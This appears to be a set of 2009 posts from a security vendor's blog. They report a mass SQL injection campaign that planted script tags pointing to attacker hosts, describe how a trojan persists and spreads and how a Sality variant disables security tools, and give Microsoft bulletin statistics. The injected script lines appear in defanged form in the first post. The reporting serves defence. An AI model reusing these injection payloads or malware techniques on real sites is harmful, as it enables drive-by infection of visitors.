Recently, a new wave of massive SQL injection attacks has been detected by Bkis researchers. At the climax of the wave, according to Google search results, more than 187.000 websites were compromised.

In the infected website list, most of them are Chinese websites, including Chinese government websites  with the .gov.cn domain names, .edu.cn websites…

Google search results

All these websites have SQL injection flaw, database has been injected many times with the following code: script src=hxxp://wgwggg.cn:1/1.js script

(Update on 17 Dec 2009: According to our latest analysis, hackers have injected new code into more than 178.000 websites as follow: script src = hxxp://a.118cc.cn script. You can see the Google search results here)

View source of an infected website with malicious script

When users visit these websites, the script will be executed and silently loads hidden iframes which contain exploit codes from malicious websites, then download malwares to the users’ computers.

Malicious code in .js file

Exploit tree

Malicious websites use exploit codes of following vulnerabilities:

• Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
• MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
• Microsoft Office Web Components vulnerabilities described in MS09-043
• Microsoft video ActiveX vulnerability described in MS09-032
• Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002.

Successful exploit will silently download the file upload.css (W32.CSSExploit.Trojan detected by Bkav) and install it on users’ computers.

Virus W32.CSSExploit.Trojan has the following technical details:

1. Dumps file: %UserProfile%\[RandomName].drv
2. Renames itself to “auto.exe” then copies itself to %ProgramFiles%\Common Files\ folder
3. Write the key: [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]
4. and registers the service: DrvKiller to run the virus at Windows start-up.
5. Copies file “autorun.inf” and itself to all drives for spreading.
6. Changes homepage to http://www.playbo[removed]ing.com.cn:8788/
7. Installs backdoor to allow hacker to remote control computers
8. Downloads and executes many online game viruses and other malwares on the infected computers.

According to the analysis, the virus and the wave of attacks are suspected to be originated from Chinese.

We are still tracking and making further analysis on this attack.

Recommendation for prevention:

• Up to now, many websites are still unfixed. Admins of these websites should quickly remove malicious scripts injected into database and fix websites’ SQL injection flaws to prevent the next wave of attack.
• Users should update the latest Microsoft and Adobe patches.
• Users should update the anti-virus software.

Bkis

The exploit code in pdf file

New variant of Sality, one of the most active families of metamorphic file infectors until now, has been released.

In this latest variant, Sality still uses old methods to spread by infecting local and network disks, infecting a copy of winmie.exe or notepad.exe and then putting it onto removable drives with an autorun.inf file to execute the infector. However, instead of using Entry Point Obscuring technique (EPO) as the previous variant, this variant of Sality uses simpler method to gain control of the host PE file. It replaces the first instruction of the host entry point with a call instruction (E8 opcode). This call instruction will transfer control to the virus’s metamorphic code at the end of the file. This code then decrypts the virus body which does the main work. When the virus body runs, it will find victims to infect. During this process, if a file’s name is in Sality’s blacklist (almost filenames in this blacklist are of security tool files), the infector will make this file unable to execute properly by overwriting the instruction at entry point with a ret instruction (C3 opcode). Then, when user executes this file, the process will terminate immediately.

In addition, Sality also tries different ways to protect itself, such as disabling Windows Task Manager and Windows Registry Editor, attacking antivirus programs, keeping Windows Security Center from producing alert messages and preventing user from using Windows in Safe Mode. The virus loads its kernel driver and registers its filter function with Windows IP Traffic Filter Driver. This means Sality has its own custom firewall and this firewall monitors users’ traffic to Internet and prevents their computers from accessing antivirus producers’ websites. In this way, communication between users and antivirus producers through Internet is broken, antivirus programs can’t connect to their sites to update database, users can’t get solutions from the producers to solve their trouble. Furthermore, Sality downloads and executes other malwares on the infected computer. All these tasks put users’ systems at high risk: users’ sensitive information can be stolen without their consent.

Back to technique, older versions of the virus used the RC4 algorithm to encrypt the main virus body whereas the latest version uses a much simpler addition/subtraction/exclusive OR scheme. However, metamorphic code generated for decrypting the main virus body is more complex than the older. It is more difficult to indicate which instruction is used to decrypt the virus body and which is only junk code, which register contains useful value and which does not. Antivirus programs must work more sophisticatedly to collect enough parameters for decrypting and cleaning virus from host files.

This variant of Sality is detected in our antivirus software, Bkav, as W32.SalityVI.PE.

Analyst: Nguyen Ngoc Zung

On 8th December, Microsoft released the last security bulletins in 2009 for its software. In order for users to have an overall picture, Bkis has made a statistics about the number of these bulletins, their maximum severity rating and the operating systems affected during 2009.

Microsoft Security Bulletins and their severity for each month in 2009

Number of security bulletins per Operating System since the release of Windows 7.

According to the above charts, by and large, the number of security bulletins released in 2009 approximates that in the previous year – 2008. More precisely, there were a total of 74 bulletins (78 in 2008), more than half of which (44 bulletins) were rated critical which might “allow the propagation of an Internet worm without user action”, according to the security rating system of Microsoft. The number of bulletins per month reached its peak in October, with 13 bulletins, all of which were rated critical or important. In addition, it can be seen that more vulnerabilities were published and patched in the second half of the year than the first half.

Since October 2009, the numbers of bulletins per operating system were quite uniform except for that of Windows 7 and Windows 2008 R2, which has just been released by Microsoft near the end of the year, as the corporation has applied new advanced technologies to them. Yet it is still too soon to make any assumption that these new OSs are more secure than their predecessors since they have just entered the market for 2 months.

By Hoang Xuan Minh